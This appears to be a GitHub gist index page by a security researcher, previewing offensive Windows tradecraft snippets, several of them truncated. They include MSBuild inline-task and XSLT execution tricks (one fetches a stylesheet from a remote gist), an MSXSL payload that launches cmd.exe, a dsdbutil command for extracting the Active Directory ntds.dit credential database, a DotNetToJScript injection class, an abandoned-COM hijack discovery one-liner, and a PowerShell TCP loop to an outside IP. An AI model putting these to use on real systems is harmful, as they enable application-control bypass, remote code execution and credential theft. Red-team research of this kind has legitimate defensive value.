Skip to content

Instantly share code, notes, and snippets.

bohops

Block or report user

Report or block bohops

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View simple_msbuild.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine(":-) CSHARP :-)");]]>
</Code>
</Task>
</UsingTask>
<Target Name="Build">
<HelloWorld />
@bohops
bohops / dsdbutil.exe
Last active Sep 16, 2019
yet another native AD database extraction utility
View dsdbutil.exe
DSDButil
========
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
View msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
@bohops
bohops / poc.png
Created May 22, 2019
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@bohops
bohops / WSH_approved_list.txt
Created Mar 13, 2019 — forked from mattifestation/WSH_approved_list.txt
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
View WSH_approved_list.txt
041e868e-0c7d-48c6-965f-5fd576530e5b
0438c02b-eb9c-4e42-81ad-407f6cd6cde1
078b1f7d-c34c-4b13-a7c3-9663901650f1
0abb2961-2cc1-4f1d-be8e-9d330d06b77d
0d7237e6-930f-4682-ad0a-52ebffd3aee3
0d972387-817b-46e7-913f-e9993ff401eb
0e770b12-7221-4a5d-86ee-77310a5506bb
0fa57208-5100-4cd6-955c-fe69f8898973
1080a020-2b47-4da9-8095-dbc9cefffc04
10cf2e12-1681-4c53-adc0-932c84832cd8
View Abandoned_COM_PowerShell.txt
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32')
@bohops
bohops / minimalist.xml
Created Nov 4, 2018
MSXSL Single File Payload
View minimalist.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
@bohops
bohops / Inject.cs
Created Oct 30, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
View PowerShell TCP_Interval.txt
while ($true) {
$(Get-Date).ToUniversalTime()
$Runspace = [runspacefactory]::CreateRunspace()
$PowerShell = [powershell]::Create()
$PowerShell.runspace = $Runspace
$Runspace.Open()
[void]$PowerShell.AddScript({
$tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80)
$tcpStream = $tcpConnection.GetStream()
You can’t perform that action at this time.